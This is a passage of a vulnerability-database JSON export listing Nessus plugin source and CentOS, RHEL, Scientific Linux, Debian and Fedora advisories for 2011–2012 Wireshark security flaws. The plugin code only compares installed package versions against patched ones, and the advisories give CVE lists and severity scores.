["p-cpe:/a:centos:centos:wireshark", "p-cpe:/a:centos:centos:wireshark-devel", "p-cpe:/a:centos:centos:wireshark-gnome", "cpe:/o:centos:centos:6"], "id": "CENTOS_RHSA-2012-0509.NASL", "href": "https://www.tenable.com/plugins/nessus/58849", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0509 and \n# CentOS Errata and Security Advisory 2012:0509 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58849);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2011-1143\", \"CVE-2011-1590\", \"CVE-2011-1957\", \"CVE-2011-1958\", \"CVE-2011-1959\", \"CVE-2011-2174\", \"CVE-2011-2175\", \"CVE-2011-2597\", \"CVE-2011-2698\", \"CVE-2011-4102\", \"CVE-2012-0041\", \"CVE-2012-0042\", \"CVE-2012-0066\", \"CVE-2012-0067\", \"CVE-2012-1595\");\n script_bugtraq_id(46796, 47392, 48066, 48506, 49071, 50486, 51368, 51710, 52737);\n script_xref(name:\"RHSA\", value:\"2012:0509\");\n\n script_name(english:\"CentOS 6 : wireshark (CESA-2012:0509)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated wireshark packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nWireshark is a program for monitoring network traffic. Wireshark was\npreviously known as Ethereal.\n\nSeveral flaws were found in Wireshark. If Wireshark read a malformed\npacket off a network or opened a malicious dump file, it could crash\nor, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2011-1590, CVE-2011-4102, CVE-2012-1595)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark\ncould crash or stop responding if it read a malformed packet off a\nnetwork, or opened a malicious dump file. (CVE-2011-1143,\nCVE-2011-1957, CVE-2011-1958, CVE-2011-1959, CVE-2011-2174,\nCVE-2011-2175, CVE-2011-2597, CVE-2011-2698, CVE-2012-0041,\nCVE-2012-0042, CVE-2012-0067, CVE-2012-0066)\n\nUsers of Wireshark should upgrade to these updated packages, which\ncontain backported patches to correct these issues. All running\ninstances of Wireshark must be restarted for the update to take\neffect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-April/018591.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?37b8b9cf\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2011-1143\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:wireshark-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/03/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"wireshark-1.2.15-2.el6_2.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"wireshark-devel-1.2.15-2.el6_2.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"wireshark-gnome-1.2.15-2.el6_2.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark / wireshark-devel / wireshark-gnome\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T12:58:33", "description": "Updated wireshark packages that fix several security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nWireshark is a program for monitoring network traffic. Wireshark was previously known as Ethereal.\n\nSeveral flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2011-1590, CVE-2011-4102, CVE-2012-1595)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file. (CVE-2011-1143, CVE-2011-1957, CVE-2011-1958, CVE-2011-1959, CVE-2011-2174, CVE-2011-2175, CVE-2011-2597, CVE-2011-2698, CVE-2012-0041, CVE-2012-0042, CVE-2012-0067, CVE-2012-0066)\n\nUsers of Wireshark should upgrade to these updated packages, which contain backported patches to correct these issues. All running instances of Wireshark must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-24T00:00:00", "type": "nessus", "title": "RHEL 6 : wireshark (RHSA-2012:0509)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1143", "CVE-2011-1590", "CVE-2011-1957", "CVE-2011-1958", "CVE-2011-1959", "CVE-2011-2174", "CVE-2011-2175", "CVE-2011-2597", "CVE-2011-2698", "CVE-2011-4102", "CVE-2012-0041", "CVE-2012-0042", "CVE-2012-0066", "CVE-2012-0067", "CVE-2012-1595"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:wireshark", "p-cpe:/a:redhat:enterprise_linux:wireshark-debuginfo", "p-cpe:/a:redhat:enterprise_linux:wireshark-devel", "p-cpe:/a:redhat:enterprise_linux:wireshark-gnome", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.2"], "id": "REDHAT-RHSA-2012-0509.NASL", "href": "https://www.tenable.com/plugins/nessus/58841", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0509. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58841);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-1143\", \"CVE-2011-1590\", \"CVE-2011-1957\", \"CVE-2011-1958\", \"CVE-2011-1959\", \"CVE-2011-2174\", \"CVE-2011-2175\", \"CVE-2011-2597\", \"CVE-2011-2698\", \"CVE-2011-4102\", \"CVE-2012-0041\", \"CVE-2012-0042\", \"CVE-2012-0066\", \"CVE-2012-0067\", \"CVE-2012-1595\");\n script_bugtraq_id(46796, 47392, 48066, 48506, 49071, 50486, 51368, 51710, 52737);\n script_xref(name:\"RHSA\", value:\"2012:0509\");\n\n script_name(english:\"RHEL 6 : wireshark (RHSA-2012:0509)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated wireshark packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nWireshark is a program for monitoring network traffic. Wireshark was\npreviously known as Ethereal.\n\nSeveral flaws were found in Wireshark. If Wireshark read a malformed\npacket off a network or opened a malicious dump file, it could crash\nor, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2011-1590, CVE-2011-4102, CVE-2012-1595)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark\ncould crash or stop responding if it read a malformed packet off a\nnetwork, or opened a malicious dump file. (CVE-2011-1143,\nCVE-2011-1957, CVE-2011-1958, CVE-2011-1959, CVE-2011-2174,\nCVE-2011-2175, CVE-2011-2597, CVE-2011-2698, CVE-2012-0041,\nCVE-2012-0042, CVE-2012-0067, CVE-2012-0066)\n\nUsers of Wireshark should upgrade to these updated packages, which\ncontain backported patches to correct these issues. All running\ninstances of Wireshark must be restarted for the update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0509\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1595\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1957\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2698\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0067\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-2597\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1590\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0041\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4102\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0042\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1958\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-1959\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wireshark-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wireshark-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/03/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0509\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"wireshark-1.2.15-2.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"wireshark-debuginfo-1.2.15-2.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"wireshark-devel-1.2.15-2.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"wireshark-gnome-1.2.15-2.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"wireshark-gnome-1.2.15-2.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"wireshark-gnome-1.2.15-2.el6_2.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark / wireshark-debuginfo / wireshark-devel / wireshark-gnome\");\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T12:57:50", "description": "Wireshark is a program for monitoring network traffic. Wireshark was previously known as Ethereal.\n\nSeveral flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2011-1590, CVE-2011-4102, CVE-2012-1595)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file. (CVE-2011-1143, CVE-2011-1957, CVE-2011-1958, CVE-2011-1959, CVE-2011-2174, CVE-2011-2175, CVE-2011-2597, CVE-2011-2698, CVE-2012-0041, CVE-2012-0042, CVE-2012-0067, CVE-2012-0066)\n\nUsers of Wireshark should upgrade to these updated packages, which contain backported patches to correct these issues. All running instances of Wireshark must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : wireshark on SL6.x i386/x86_64 (20120423)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1143", "CVE-2011-1590", "CVE-2011-1957", "CVE-2011-1958", "CVE-2011-1959", "CVE-2011-2174", "CVE-2011-2175", "CVE-2011-2597", "CVE-2011-2698", "CVE-2011-4102", "CVE-2012-0041", "CVE-2012-0042", "CVE-2012-0066", "CVE-2012-0067", "CVE-2012-1595"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:wireshark", "p-cpe:/a:fermilab:scientific_linux:wireshark-debuginfo", "p-cpe:/a:fermilab:scientific_linux:wireshark-devel", "p-cpe:/a:fermilab:scientific_linux:wireshark-gnome", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20120423_WIRESHARK_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61303", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61303);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-1143\", \"CVE-2011-1590\", \"CVE-2011-1957\", \"CVE-2011-1958\", \"CVE-2011-1959\", \"CVE-2011-2174\", \"CVE-2011-2175\", \"CVE-2011-2597\", \"CVE-2011-2698\", \"CVE-2011-4102\", \"CVE-2012-0041\", \"CVE-2012-0042\", \"CVE-2012-0066\", \"CVE-2012-0067\", \"CVE-2012-1595\");\n\n script_name(english:\"Scientific Linux Security Update : wireshark on SL6.x i386/x86_64 (20120423)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Wireshark is a program for monitoring network traffic. Wireshark was\npreviously known as Ethereal.\n\nSeveral flaws were found in Wireshark. If Wireshark read a malformed\npacket off a network or opened a malicious dump file, it could crash\nor, possibly, execute arbitrary code as the user running Wireshark.\n(CVE-2011-1590, CVE-2011-4102, CVE-2012-1595)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark\ncould crash or stop responding if it read a malformed packet off a\nnetwork, or opened a malicious dump file. (CVE-2011-1143,\nCVE-2011-1957, CVE-2011-1958, CVE-2011-1959, CVE-2011-2174,\nCVE-2011-2175, CVE-2011-2597, CVE-2011-2698, CVE-2012-0041,\nCVE-2012-0042, CVE-2012-0067, CVE-2012-0066)\n\nUsers of Wireshark should upgrade to these updated packages, which\ncontain backported patches to correct these issues. All running\ninstances of Wireshark must be restarted for the update to take\neffect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1204&L=scientific-linux-errata&T=0&P=1614\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f4ff351f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:wireshark-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:wireshark-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/03/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"wireshark-1.2.15-2.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"wireshark-debuginfo-1.2.15-2.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"wireshark-devel-1.2.15-2.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"wireshark-gnome-1.2.15-2.el6_2.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark / wireshark-debuginfo / wireshark-devel / wireshark-gnome\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "osv": [{"lastseen": "2022-08-10T07:08:51", "description": "\nSeveral remote vulnerabilities have been discovered in the Wireshark\nnetwork traffic analyzer. It was discovered that null pointer\ndereferences, buffer overflows and infinite loops in the SMB, SMB\nPIPE, ASN1.1 and SigComp dissectors could lead to denial of service\nor the execution of arbitrary code.\n\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 1.0.2-3+lenny9.\n\n\nFor the upcoming stable distribution (squeeze) and the unstable \ndistribution (sid), these problems have been fixed in version \n1.2.9-1.\n\n\nWe recommend that you upgrade your wireshark packages.\n\n\n", "cvss3": {}, "published": "2010-07-01T00:00:00", "type": "osv", "title": "wireshark - several vulnerabilities", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2285", "CVE-2010-2286", "CVE-2010-2287"], "modified": "2022-08-10T07:08:37", "id": "OSV:DSA-2066-1", "href": "https://osv.dev/vulnerability/DSA-2066-1", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T07:08:51", "description": "\nHuzaifa Sidhpurwala, David Maciejak and others discovered several\nvulnerabilities in the X.509if and DICOM dissectors and in the code to\nprocess various capture and dictionary files, which could lead to denial\nof service or the execution of arbitrary code.\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.2-3+lenny14.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.11-6+squeeze2.\n\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.2.17-1\n\n\nWe recommend that you upgrade your wireshark packages.\n\n\n", "cvss3": {}, "published": "2011-07-07T00:00:00", "type": "osv", "title": "wireshark - multiple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1590", "CVE-2011-1957", "CVE-2011-1958", "CVE-2011-1959", "CVE-2011-2174", "CVE-2011-2175"], "modified": "2022-08-10T07:08:44", "id": "OSV:DSA-2274-1", "href": "https://osv.dev/vulnerability/DSA-2274-1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "description": "Wireshark is a network traffic analyzer for Unix-ish operating systems. This package lays base for libpcap, a packet capture and filtering library, contains command-line utilities, contains plugins and documentation for wireshark. A graphical user interface is packaged separately to GTK+ package. ", "cvss3": {}, "published": "2011-01-13T23:31:35", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: wireshark-1.2.13-2.fc13", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-4538"], "modified": "2011-01-13T23:31:35", "id": "FEDORA:77FD910F9EE", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/BNGPBH4YOVMLE2CV3PFSRSQ5NDF6C4RU/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:50", "description": "Wireshark is a network traffic analyzer for Unix-ish operating 